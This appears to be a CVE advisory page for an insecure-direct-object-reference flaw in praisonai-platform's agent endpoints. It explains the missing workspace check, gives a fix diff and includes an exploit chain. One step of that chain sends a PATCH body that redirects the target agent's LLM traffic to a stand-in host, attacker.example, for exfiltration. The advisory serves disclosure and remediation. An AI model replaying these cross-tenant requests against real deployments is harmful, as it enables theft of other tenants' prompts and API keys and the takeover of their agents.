Skip to main content

praisonai-platform CVE-2026-47419

HIGH
Authorization Bypass Through User-Controlled Key (CWE-639)
2026-06-05 https://github.com/MervinPraison/PraisonAI GHSA-7p8g-6c6g-h9w7
8.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.3 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 05, 2026 - 16:56 vuln.today
Analysis Generated
Jun 05, 2026 - 16:56 vuln.today

DescriptionGitHub Advisory

Summary

Type: Insecure Direct Object Reference. The agent CRUD endpoints (GET / PATCH / DELETE /workspaces/{workspace_id}/agents/{agent_id}) gate access on require_workspace_member(workspace_id) only, then resolve agent_id through AgentService.get(agent_id) which is a primary-key lookup with no workspace constraint. A user who is a member of any workspace W1 can read, modify, or delete agents that belong to a different workspace W2 by guessing or harvesting an agent UUID and calling …/workspaces/W1/agents/<W2-agent-id>. File: src/praisonai-platform/praisonai_platform/services/agent_service.py, lines 53-112; route handlers at src/praisonai-platform/praisonai_platform/api/routes/agents.py, lines 53-100. Root cause: the route extracts workspace_id from the URL path and passes it to require_workspace_member for the membership check, but never threads it through to the service layer. AgentService.get calls session.get(Agent, agent_id), which is SELECT * FROM agents WHERE id = :agent_id with no AND workspace_id = :workspace_id. update and delete call self.get(agent_id) first and then mutate the returned row, inheriting the same gap. The MemberService is the one place in this codebase that does this correctly: it uses (workspace_id, user_id) as a composite key. The agent service simply forgot the second predicate, which is the textbook GHSA pattern for FastAPI services that treat routing parameters as decorative rather than authoritative.

Affected Code

File 1: src/praisonai-platform/praisonai_platform/services/agent_service.py, lines 53-55 and 105-112.

python
class AgentService:
    ...

    async def get(self, agent_id: str) -> Optional[Agent]:
        """Get agent by ID."""
        return await self._session.get(Agent, agent_id)
# <-- BUG: no workspace_id predicate

    async def update(
        self,
        agent_id: str,
        name: Optional[str] = None,
        ...
    ) -> Optional[Agent]:
        agent = await self.get(agent_id)
# <-- inherits the same gap
        if agent is None:
            return None
        ...
        return agent

    async def delete(self, agent_id: str) -> bool:
        agent = await self.get(agent_id)
# <-- inherits the same gap
        if agent is None:
            return False
        await self._session.delete(agent)
        await self._session.flush()
        return True

File 2: src/praisonai-platform/praisonai_platform/api/routes/agents.py, lines 53-101.

python
@router.get("/{agent_id}", response_model=AgentResponse)
async def get_agent(
    workspace_id: str,
    agent_id: str,
    user: AuthIdentity = Depends(require_workspace_member),
# only checks membership in workspace_id
    session: AsyncSession = Depends(get_db),
):
    svc = AgentService(session)
    agent = await svc.get(agent_id)
# <-- workspace_id never passed; svc.get returns any agent in the DB
    if agent is None:
        raise HTTPException(status_code=404, detail="Agent not found")
    return AgentResponse.model_validate(agent)

The update_agent (lines 67-87) and delete_agent (lines 90-100) handlers exhibit the same pattern: they receive workspace_id via path parameter, use it solely for the membership gate, then call svc.update(agent_id, ...) / svc.delete(agent_id) without re-checking which workspace the agent actually belongs to.

Why it's wrong: the workspace_id segment in the route is treated as a UI hint (it gates "are you in some workspace W?") rather than an authoritative predicate (it should also gate "is the resource you are addressing actually inside W?"). A standard fix in FastAPI/SQLAlchemy services is to make the resource-lookup query include the workspace predicate and treat absence as 404, so that a foreign-workspace agent is indistinguishable from a non-existent one. The codebase already does this correctly in MemberService.get(workspace_id, user_id) and in *.list_for_workspace(workspace_id, ...) - the gap is specific to the single-row get / update / delete paths.

Exploit Chain

  1. Attacker registers two accounts (or recruits a single workspace member) and creates two workspaces: W_attacker (attacker is a member) and obtains a known agent_id from W_target (a workspace the attacker is NOT a member of). Agent IDs are uuid4 strings (DB column default), but they leak through several side channels: user-list endpoints when an agent is mentioned in an issue body, the activity feed (activity.py:log records entity_id=agent.id), webhook payloads, error messages, exported issue dumps, or simply by enumeration if the deployment does not rotate IDs frequently. State: attacker holds a target agent UUID A_T.
  2. Attacker authenticates and POSTs Authorization: Bearer <attacker_jwt> to GET /workspaces/W_attacker/agents/A_T. require_workspace_member(W_attacker, attacker) returns the attacker's identity (they are a member of W_attacker). State: control flow enters get_agent with workspace_id=W_attacker, agent_id=A_T.
  3. AgentService.get(A_T) runs session.get(Agent, "A_T"), which is SELECT * FROM agents WHERE id = 'A_T' LIMIT 1. The query has no workspace_id = 'W_attacker' filter and returns the row - including its instructions, runtime_config, name, status, owner_id, etc - even though agent.workspace_id == 'W_target'. State: response body is the JSON-serialised target agent.
  4. Attacker repeats with PATCH /workspaces/W_attacker/agents/A_T and a body of {"instructions": "<malicious system prompt>", "runtime_mode": "cloud", "runtime_config": {"api_base": "https://attacker.example/v1", "api_key": "<exfil>"}}. update_agent calls svc.update(A_T, ...) which loads the target row and mutates the listed fields. State: the foreign workspace's agent now has attacker-chosen instructions and routes its LLM traffic through attacker.example.
  5. Attacker calls DELETE /workspaces/W_attacker/agents/A_T to wipe the target agent altogether, or repeats step 4 against every agent UUID they can harvest. State: target workspace's agent fleet is destroyed or backdoored.

Security Impact

Severity: sec-high. CVSS 8.1: network attack, low complexity, low privileges (any authenticated workspace member), no user interaction, scope unchanged (the auth context is the same component), high confidentiality (full agent record including instructions and runtime config), high integrity (arbitrary writes), low availability (DELETE wipes target agents). Attacker capability: with one workspace-member token plus a harvested or guessed agent UUID, an attacker can read the target agent's instructions (often a proprietary system prompt), runtime_config (frequently contains LLM provider URLs and API keys when the deployment uses BYOK), owner_id, and status; rewrite the same fields to redirect the agent's LLM traffic to an attacker-controlled endpoint (proxy-and-log of every prompt, prompt injection of every response); flip status to error to silently break a competitor workspace's agent fleet; or delete the agents outright. Preconditions: praisonai-platform is deployed multi-tenant (more than one workspace exists); the attacker has any membership token; the target agent's UUID is known or guessable (uuid4 randomness is large but UUIDs leak through activity feeds, webhook payloads, issue mentions, error messages, and operator screenshots). Differential: source-inspection-verified end-to-end. The asymmetry between AgentService.get(agent_id) (no workspace check) and MemberService.get(workspace_id, user_id) (composite key check) is the smoking gun: the same author wrote both patterns, but only the member service is tenant-safe. With the suggested fix below applied, AgentService.get(workspace_id, agent_id) returns None when the agent belongs to a different workspace, the route handler returns 404, and the foreign workspace's data is indistinguishable from a missing record.

Suggested Fix

Make every single-row resource lookup take the workspace predicate. Treat foreign-workspace rows as 404, not 200, so the endpoint does not even confirm that the target ID exists.

diff
--- a/src/praisonai-platform/praisonai_platform/services/agent_service.py
+++ b/src/praisonai-platform/praisonai_platform/services/agent_service.py
@@ -50,9 +50,12 @@ class AgentService:
         await self._session.flush()
         return agent

-    async def get(self, agent_id: str) -> Optional[Agent]:
-        """Get agent by ID."""
-        return await self._session.get(Agent, agent_id)
+    async def get(self, workspace_id: str, agent_id: str) -> Optional[Agent]:
+        """Get agent by ID, scoped to a workspace."""
+        stmt = select(Agent).where(
+            Agent.id == agent_id, Agent.workspace_id == workspace_id
+        )
+        return (await self._session.execute(stmt)).scalar_one_or_none()

     async def list_for_workspace(
         self,
@@ -71,6 +74,7 @@ class AgentService:

     async def update(
         self,
+        workspace_id: str,
         agent_id: str,
         name: Optional[str] = None,
         ...
     ) -> Optional[Agent]:
-        agent = await self.get(agent_id)
+        agent = await self.get(workspace_id, agent_id)
         if agent is None:
             return None
         ...

-    async def delete(self, agent_id: str) -> bool:
+    async def delete(self, workspace_id: str, agent_id: str) -> bool:
-        agent = await self.get(agent_id)
+        agent = await self.get(workspace_id, agent_id)
         if agent is None:
             return False

The route handlers in routes/agents.py then need to pass workspace_id into every svc.get/update/delete call. Repeat the pattern for IssueService, ProjectService, CommentService, and LabelService, which exhibit the same single-key lookup; those should be filed and fixed as separate advisories so each gets its own CVE.

AnalysisAI

Cross-workspace Insecure Direct Object Reference in praisonai-platform before 0.1.4 allows any authenticated workspace member to read, modify, or delete AI agents belonging to entirely different workspaces by supplying a foreign agent UUID to the CRUD endpoints. The membership authorization gate checks only whether the caller belongs to the workspace in the URL path - it never verifies that the target agent actually resides in that workspace - so an attacker with any valid JWT can pivot across tenant boundaries. In multi-tenant deployments where agents store LLM API keys in runtime_config (BYOK), this also becomes a credential theft vector. No public exploit is identified at time of analysis, though GHSA-7p8g-6c6g-h9w7 publishes a complete step-by-step exploit chain.

Technical ContextAI

praisonai-platform (pkg:pip/praisonai-platform) is a multi-tenant FastAPI and SQLAlchemy Python application for managing AI agents. The flaw is a textbook CWE-639 (Authorization Through User-Controlled Key): the application correctly verifies workspace membership via require_workspace_member(workspace_id), but the workspace_id path segment is used only as an access token - it is never threaded into the SQLAlchemy service layer as a scoping predicate. AgentService.get() at agent_service.py lines 53-55 executes session.get(Agent, agent_id), which SQLAlchemy translates to SELECT * FROM agents WHERE id = :agent_id with no AND workspace_id = :workspace_id clause. The update() and delete() methods at lines 74-112 call self.get(agent_id) first and then mutate the returned row, inheriting the same gap. The same codebase already demonstrates the correct pattern in MemberService, which uses a composite (workspace_id, user_id) key - the gap is specific to the three single-row lookup paths in AgentService. The GHSA advisory also identifies IssueService, ProjectService, CommentService, and LabelService as exhibiting the same pattern.

RemediationAI

Vendor-released patch: 0.1.4. Upgrade praisonai-platform to version 0.1.4 or later via pip install --upgrade praisonai-platform; this release adds workspace_id scoping to AgentService.get(), update(), and delete() so all single-row lookups include a composite WHERE id = :agent_id AND workspace_id = :workspace_id predicate. Full diff is available in the vendor advisory at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7p8g-6c6g-h9w7. If immediate patching is not feasible, the most effective compensating control is enforcing single-tenant operation - restrict workspace creation to administrators so only one workspace exists per instance, which eliminates the cross-workspace attack surface at the cost of disabling multi-tenancy. A WAF rule rejecting agent path requests where the agent UUID is not in the authenticated user's workspace provides partial mitigation but requires an external ownership mapping that duplicates application logic and adds operational overhead. The advisory also flags IssueService, ProjectService, CommentService, and LabelService as carrying the same IDOR pattern; those should be audited and patched under separate advisories.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-47419 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy